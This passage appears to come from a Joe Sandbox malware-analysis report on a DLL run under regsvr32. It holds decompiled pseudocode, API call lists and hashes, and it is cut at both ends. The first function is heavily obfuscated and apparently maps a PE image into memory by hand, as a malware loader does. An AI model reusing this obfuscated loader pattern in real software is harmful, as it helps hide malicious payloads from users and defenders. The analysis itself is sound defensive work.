                                                                                                            													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
                                                                                                            													_t1251 = _t1250 + 8;
                                                                                                            													if(_t433 == 0) {
                                                                                                            														L31:
                                                                                                            														_push(_t1066);
                                                                                                            														E10004DD0();
                                                                                                            														goto L32;
                                                                                                            													} else {
                                                                                                            														_t743 =  *0x1004b0e0; // 0x0
                                                                                                            														_t436 =  *0x1004b0e8; // 0x0
                                                                                                            														_t437 =  *0x1004b0dc; // 0x0
                                                                                                            														_t752 =  *0x1004b0e0; // 0x0
                                                                                                            														_t1170 =  *0x1004b0e4; // 0x0
                                                                                                            														_t438 =  *0x1004b0e8; // 0x0
                                                                                                            														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
                                                                                                            														_t754 =  *0x1004b0dc; // 0x0
                                                                                                            														_t590 =  *0x1004b0d8; // 0x0
                                                                                                            														_t1174 =  *0x1004b0d8; // 0x0
                                                                                                            														 *(_t1251 + 0x34) = _t441;
                                                                                                            														_t442 =  *0x1004b0e8; // 0x0
                                                                                                            														_t888 =  *0x1004b0e4; // 0x0
                                                                                                            														_t444 =  *0x1004b0ec; // 0x0
                                                                                                            														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
                                                                                                            														_t604 =  *0x1004b0d8; // 0x0
                                                                                                            														_t756 =  *0x1004b0dc; // 0x0
                                                                                                            														_t448 =  *0x1004b0e0; // 0x0
                                                                                                            														_t890 =  *0x1004b0ec; // 0x0
                                                                                                            														_t891 =  *0x1004b0d8; // 0x0
                                                                                                            														_t279 = _t448 + 0x2e9; // 0x2e9
                                                                                                            														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
                                                                                                            														 *_t1066 = _t453;
                                                                                                            														_t759 =  *0x1004b0e4; // 0x0
                                                                                                            														_t1184 =  *0x1004b0e0; // 0x0
                                                                                                            														_t895 =  *0x1004b0e8; // 0x0
                                                                                                            														_t1187 =  *0x1004b0ec; // 0x0
                                                                                                            														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
                                                                                                            														_t900 =  *0x1004b0e8; // 0x0
                                                                                                            														_t454 =  *0x1004b0e4; // 0x0
                                                                                                            														_t761 =  *0x1004b0ec; // 0x0
                                                                                                            														_t624 =  *0x1004b0d8; // 0x0
                                                                                                            														_t293 = _t624 + 1; // 0x1
                                                                                                            														_t463 =  *0x1004b0e0; // 0x0
                                                                                                            														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
                                                                                                            														_push(_t951);
                                                                                                            														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
                                                                                                            														_push( *((intOrPtr*)(_t1251 + 0x84)));
                                                                                                            														_t467 = E10002CA0();
                                                                                                            														_t1251 = _t1251 + 0x30;
                                                                                                            														if(_t467 == 0) {
                                                                                                            															goto L31;
                                                                                                            														} else {
                                                                                                            															_t468 =  *0x1004b0e8; // 0x0
                                                                                                            															_t765 =  *0x1004b0d8; // 0x0
                                                                                                            															_t1200 =  *0x1004b0dc; // 0x0
                                                                                                            															_t903 =  *0x1004b0e4; // 0x0
                                                                                                            															_t905 =  *0x1004b0ec; // 0x0
                                                                                                            															_t1202 = _t765 - _t905 + _t905;
                                                                                                            															_t907 =  *0x1004b0dc; // 0x0
                                                                                                            															_t299 = _t1202 - 2; // -2
                                                                                                            															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
                                                                                                            															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
                                                                                                            															if(_t636 == 0) {
                                                                                                            																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
                                                                                                            															} else {
                                                                                                            																_t963 =  *0x1004b0e0; // 0x0
                                                                                                            																_t1227 =  *0x1004b0e4; // 0x0
                                                                                                            																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
                                                                                                            																_t970 =  *0x1004b0e0; // 0x0
                                                                                                            																_t971 =  *0x1004b0e4; // 0x0
                                                                                                            																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
                                                                                                            																_t492 = E10003B80();
                                                                                                            																_t924 =  *0x1004b0e0; // 0x0
                                                                                                            																_t1251 = _t1251 + 8;
                                                                                                            																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
                                                                                                            															}
                                                                                                            															_t469 =  *0x1004b0e4; // 0x0
                                                                                                            															_t766 =  *0x1004b0e0; // 0x0
                                                                                                            															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
                                                                                                            															_t473 = E10003F40();
                                                                                                            															_t1251 = _t1251 + 4;
                                                                                                            															if(_t473 == 0) {
                                                                                                            																goto L31;
                                                                                                            															} else {
                                                                                                            																_t474 =  *0x1004b0e8; // 0x0
                                                                                                            																_t770 =  *0x1004b0dc; // 0x0
                                                                                                            																_t637 =  *0x1004b0e4; // 0x0
                                                                                                            																_t318 = _t474 * 2; // 0x1
                                                                                                            																_t954 =  *0x1004b0ec; // 0x0
                                                                                                            																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
                                                                                                            																_t475 = E10003570();
                                                                                                            																_t1251 = _t1251 + 4;
                                                                                                            																if(_t475 == 0) {
                                                                                                            																	goto L31;
                                                                                                            																} else {
                                                                                                            																	_t913 =  *0x1004b0e0; // 0x0
                                                                                                            																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
                                                                                                            																	_t476 = E10003AD0();
                                                                                                            																	_t1251 = _t1251 + 4;
                                                                                                            																	if(_t476 != 0) {
                                                                                                            																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
                                                                                                            																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
                                                                                                            																		if(_t478 == 0) {
                                                                                                            																			 *(_t1066 + 0x38) = 0;
                                                                                                            																			return _t1066;
                                                                                                            																		} else {
                                                                                                            																			if( *(_t1066 + 0x14) == 0) {
                                                                                                            																				_t481 =  *0x1004b0d8; // 0x0
                                                                                                            																				_t955 =  *0x1004b0e0; // 0x0
                                                                                                            																				_t918 =  *0x1004b0ec; // 0x0
                                                                                                            																				_t778 =  *0x1004b0e8; // 0x0
                                                                                                            																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
                                                                                                            																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
                                                                                                            																				return _t1066;
                                                                                                            																			} else {
                                                                                                            																				_t780 =  *0x1004b0ec; // 0x0
                                                                                                            																				_t921 =  *0x1004b0d8; // 0x0
                                                                                                            																				_t956 =  *0x1004b0e4; // 0x0
                                                                                                            																				_t642 =  *0x1004b0dc; // 0x0
                                                                                                            																				_t962 =  *0x1004b0e0; // 0x0
                                                                                                            																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
                                                                                                            																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
                                                                                                            																				return _t1066;
                                                                                                            																			}
                                                                                                            																		}
                                                                                                            																	} else {
                                                                                                            																		goto L31;
                                                                                                            																	}
                                                                                                            																}
                                                                                                            															}
                                                                                                            														}
                                                                                                            													}
                                                                                                            												} else {
                                                                                                            													_t1067 =  *0x1004b0d8; // 0x0
                                                                                                            													_t928 =  *0x1004b0dc; // 0x0
                                                                                                            													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
                                                                                                            													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
                                                                                                            													return 0;
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t789 =  *0x1004b0e4; // 0x0
                                                                                                            												_t930 =  *0x1004b0dc; // 0x0
                                                                                                            												_t1075 =  *0x1004b0d8; // 0x0
                                                                                                            												_t1076 =  *0x1004b0ec; // 0x0
                                                                                                            												_t194 = _t1076 - 4; // -4
                                                                                                            												_t665 =  *0x1004b0e8; // 0x0
                                                                                                            												_t498 =  *0x1004b0e0; // 0x0
                                                                                                            												_t1084 =  *0x1004b0d8; // 0x0
                                                                                                            												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
                                                                                                            												_t200 = _t1084 + 2; // 0x2
                                                                                                            												_t1085 =  *0x1004b0ec; // 0x0
                                                                                                            												_t668 =  *0x1004b0d8; // 0x0
                                                                                                            												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
                                                                                                            												_t520 =  *0x1004b0e0; // 0x0
                                                                                                            												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
                                                                                                            												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
                                                                                                            												_t1250 = _t1250 + 0x14;
                                                                                                            												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
                                                                                                            												if(_t523 == 0) {
                                                                                                            													goto L32;
                                                                                                            												} else {
                                                                                                            													_t585 = _t523;
                                                                                                            													goto L21;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x10005e4e
                                                                                                            0x10005e4f
                                                                                                            0x10005e50
                                                                                                            0x10005e55
                                                                                                            0x10005e5a
                                                                                                            0x00000000
                                                                                                            0x10005e60
                                                                                                            0x10005e60
                                                                                                            0x10005e65
                                                                                                            0x10005e6b
                                                                                                            0x10005e8c
                                                                                                            0x10005e96
                                                                                                            0x10005ea2
                                                                                                            0x10005ea4
                                                                                                            0x10005eaa
                                                                                                            0x10005eba
                                                                                                            0x10005ebd
                                                                                                            0x10005ec1
                                                                                                            0x10005f58
                                                                                                            0x10005ec7
                                                                                                            0x10005ec7
                                                                                                            0x10005ee6
                                                                                                            0x10005f04
                                                                                                            0x10005f05
                                                                                                            0x10005f10
                                                                                                            0x10005f38
                                                                                                            0x10005f39
                                                                                                            0x10005f3e
                                                                                                            0x10005f4e
                                                                                                            0x10005f53
                                                                                                            0x10005f53
                                                                                                            0x10005f5f
                                                                                                            0x10005f79
                                                                                                            0x10005f86
                                                                                                            0x10005f87
                                                                                                            0x10005f8c
                                                                                                            0x10005f91
                                                                                                            0x00000000
                                                                                                            0x10005f93
                                                                                                            0x10005f93
                                                                                                            0x10005f98
                                                                                                            0x10005f9e
                                                                                                            0x10005fa4
                                                                                                            0x10005fc1
                                                                                                            0x10005fd5
                                                                                                            0x10005fd6
                                                                                                            0x10005fdb
                                                                                                            0x10005fe0
                                                                                                            0x00000000
                                                                                                            0x10005fe2
                                                                                                            0x10005fe2
                                                                                                            0x10005ffb
                                                                                                            0x10005ffc
                                                                                                            0x10006001
                                                                                                            0x10006006
                                                                                                            0x1000601d
                                                                                                            0x10006022
                                                                                                            0x10006026
                                                                                                            0x1000610e
                                                                                                            0x1000611d
                                                                                                            0x1000602c
                                                                                                            0x10006031
                                                                                                            0x100060a5
                                                                                                            0x100060aa
                                                                                                            0x100060b0
                                                                                                            0x100060c4
                                                                                                            0x100060d4
                                                                                                            0x10006101
                                                                                                            0x1000610c
                                                                                                            0x10006033
                                                                                                            0x10006033
                                                                                                            0x10006039
                                                                                                            0x1000603f
                                                                                                            0x10006045
                                                                                                            0x1000606d
                                                                                                            0x1000608f
                                                                                                            0x10006095
                                                                                                            0x100060a4
                                                                                                            0x100060a4
                                                                                                            0x10006031
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10006006
                                                                                                            0x10005fe0
                                                                                                            0x10005f91
                                                                                                            0x10005e5a
                                                                                                            0x10005a9d
                                                                                                            0x10005aa1
                                                                                                            0x10005aa8
                                                                                                            0x10005acc
                                                                                                            0x10005ad7
                                                                                                            0x10005ae7
                                                                                                            0x10005ae7
                                                                                                            0x1000591a
                                                                                                            0x1000591a
                                                                                                            0x10005920
                                                                                                            0x1000592b
                                                                                                            0x10005936
                                                                                                            0x10005943
                                                                                                            0x10005947
                                                                                                            0x10005957
                                                                                                            0x10005981
                                                                                                            0x10005989
                                                                                                            0x1000598d
                                                                                                            0x100059a0
                                                                                                            0x100059ae
                                                                                                            0x100059cb
                                                                                                            0x100059d2
                                                                                                            0x100059e7
                                                                                                            0x100059f1
                                                                                                            0x100059f3
                                                                                                            0x100059f8
                                                                                                            0x100059fc
                                                                                                            0x00000000
                                                                                                            0x10005a02
                                                                                                            0x10005a02
                                                                                                            0x00000000
                                                                                                            0x10005a02
                                                                                                            0x100059fc
                                                                                                            0x10005914
                                                                                                            0x10005803
                                                                                                            0x10005505
                                                                                                            0x100054cb
                                                                                                            0x10005488
                                                                                                            0x10005409
                                                                                                            0x10005361

                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 100056FB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 10005A72
                                                                                                            • memcpy.MSVCRT ref: 10005CEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1755227880-0
                                                                                                            • Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                                                            • Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
                                                                                                            • Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                                                            • Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10037446(signed char* __ecx) {
                                                                                                            				struct _CRITICAL_SECTION* _v8;
                                                                                                            				void* _v12;
                                                                                                            				char _v32;
                                                                                                            				char _v40;
                                                                                                            				char _v48;
                                                                                                            				signed int __edi;
                                                                                                            				void* __esi;
                                                                                                            				struct _CRITICAL_SECTION* _t42;
                                                                                                            				intOrPtr _t43;
                                                                                                            				void* _t44;
                                                                                                            				void* _t45;
                                                                                                            				void* _t49;
                                                                                                            				void* _t50;
                                                                                                            				signed int _t71;
                                                                                                            				signed char* _t73;
                                                                                                            				signed int _t82;
                                                                                                            				signed char* _t85;
                                                                                                            				void* _t87;
                                                                                                            				void* _t89;
                                                                                                            				void* _t91;
                                                                                                            				void* _t92;
                                                                                                            				void* _t94;
                                                                                                            
                                                                                                            				_t73 = __ecx;
                                                                                                            				_t89 = _t94;
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t85 = __ecx;
                                                                                                            				_t1 = _t85 + 0x1c; // 0x1004f010
                                                                                                            				_t42 = _t1;
                                                                                                            				_v8 = _t42;
                                                                                                            				EnterCriticalSection(_t42);
                                                                                                            				_t3 = _t85 + 4; // 0x20
                                                                                                            				_t43 =  *_t3;
                                                                                                            				_t4 = _t85 + 8; // 0x3
                                                                                                            				if( *_t4 >= _t43) {
                                                                                                            					L6:
                                                                                                            					_t82 = 1;
                                                                                                            					if(_t43 <= 1) {
                                                                                                            						L11:
                                                                                                            						_t20 = _t43 + 0x20; // 0x40
                                                                                                            						_t71 = _t20;
                                                                                                            						_t21 = _t85 + 0x10; // 0x6f6710
                                                                                                            						_t44 =  *_t21;
                                                                                                            						if(_t44 != 0) {
                                                                                                            							_t45 = GlobalHandle(_t44);
                                                                                                            							_v12 = _t45;
                                                                                                            							GlobalUnlock(_t45);
                                                                                                            							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
                                                                                                            						} else {
                                                                                                            							_t49 = GlobalAlloc(2, _t71 << 3); // executed
                                                                                                            						}
                                                                                                            						if(_t49 != 0) {
                                                                                                            							_t50 = GlobalLock(_t49);
                                                                                                            							_t26 = _t85 + 4; // 0x20
                                                                                                            							_v12 = _t50;
                                                                                                            							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
                                                                                                            							 *(_t85 + 4) = _t71;
                                                                                                            							 *(_t85 + 0x10) = _v12;
                                                                                                            							goto L19;
                                                                                                            						} else {
                                                                                                            							_t24 = _t85 + 0x10; // 0x6f6710
                                                                                                            							_t87 =  *_t24;
                                                                                                            							if(_t87 != 0) {
                                                                                                            								GlobalLock(GlobalHandle(_t87));
                                                                                                            							}
                                                                                                            							LeaveCriticalSection(_v8);
                                                                                                            							_push(_t89);
                                                                                                            							_t91 = _t94;
                                                                                                            							_push(_t73);
                                                                                                            							_v32 = 0x1004d418;
                                                                                                            							E10011C0F( &_v32, 0x10045dc0);
                                                                                                            							asm("int3");
                                                                                                            							_push(_t91);
                                                                                                            							_t92 = _t94;
                                                                                                            							_push(_t73);
                                                                                                            							_v40 = 0x1004d4b0;
                                                                                                            							E10011C0F( &_v40, 0x10045e04);
                                                                                                            							asm("int3");
                                                                                                            							_push(_t92);
                                                                                                            							_push(_t73);
                                                                                                            							_v48 = 0x1004d548;
                                                                                                            							E10011C0F( &_v48, 0x10045e48);
                                                                                                            							asm("int3");
                                                                                                            							return _t73[0x70];
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t17 = _t85 + 0x10; // 0x6f6710
                                                                                                            						_t73 =  *_t17 + 8;
                                                                                                            						while(( *_t73 & 0x00000001) != 0) {
                                                                                                            							_t82 = _t82 + 1;
                                                                                                            							_t73 =  &(_t73[8]);
                                                                                                            							if(_t82 < _t43) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						if(_t82 < _t43) {
                                                                                                            							goto L19;
                                                                                                            						} else {
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t12 = __esi + 0x10; // 0x6f6710
                                                                                                            					__ecx =  *_t12;
                                                                                                            					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
                                                                                                            						L19:
                                                                                                            						_t33 = _t85 + 0xc; // 0x3
                                                                                                            						if(_t82 >=  *_t33) {
                                                                                                            							_t34 = _t82 + 1; // 0x4
                                                                                                            							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
                                                                                                            						}
                                                                                                            						_t36 = _t85 + 0x10; // 0x6f6710
                                                                                                            						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
                                                                                                            						_t40 = _t82 + 1; // 0x4
                                                                                                            						 *((intOrPtr*)(_t85 + 8)) = _t40;
                                                                                                            						LeaveCriticalSection(_v8);
                                                                                                            						return _t82;
                                                                                                            					} else {
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}


























                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
                                                                                                            • GlobalHandle.KERNEL32(006F6710), ref: 100374B1
                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
                                                                                                            • GlobalReAlloc.KERNEL32 ref: 100374CF
                                                                                                            • GlobalHandle.KERNEL32(006F6710), ref: 100374E1
                                                                                                            • GlobalLock.KERNEL32 ref: 100374E8
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
                                                                                                            • GlobalLock.KERNEL32 ref: 100374FD
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10037545
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667261700-0
                                                                                                            • Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                                                            • Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
                                                                                                            • Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                                                            • Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013AD4() {
                                                                                                            				int _t2;
                                                                                                            				void* _t8;
                                                                                                            				void* _t14;
                                                                                                            				void** _t15;
                                                                                                            				void* _t21;
                                                                                                            				void* _t23;
                                                                                                            
                                                                                                            				if( *0x10050a64 == 3) {
                                                                                                            					_t8 = 0;
                                                                                                            					_t21 =  *0x10050a48 - _t8; // 0x0
                                                                                                            					if(_t21 > 0) {
                                                                                                            						_t14 =  *0x10050a4c; // 0x0
                                                                                                            						_t15 = _t14 + 0xc;
                                                                                                            						do {
                                                                                                            							VirtualFree( *_t15, 0x100000, 0x4000);
                                                                                                            							VirtualFree( *_t15, 0, 0x8000);
                                                                                                            							HeapFree( *0x10050a60, 0, _t15[1]);
                                                                                                            							_t15 =  &(_t15[5]);
                                                                                                            							_t8 = _t8 + 1;
                                                                                                            							_t23 = _t8 -  *0x10050a48; // 0x0
                                                                                                            						} while (_t23 < 0);
                                                                                                            					}
                                                                                                            					HeapFree( *0x10050a60, 0,  *0x10050a4c);
                                                                                                            				}
                                                                                                            				_t2 = HeapDestroy( *0x10050a60); // executed
                                                                                                            				return _t2;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
                                                                                                            • VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
                                                                                                            • HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$Heap$Virtual$Destroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 782257640-0
                                                                                                            • Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                                                            • Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
                                                                                                            • Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                                                            • Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 158 10005090-10005097 159 100050a0-100050ab call 10004780 158->159 160 10005099-1000509a ExitProcess 158->160 163 100050b0-100050b2 159->163
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10005090() {
                                                                                                            				int _t1;
                                                                                                            
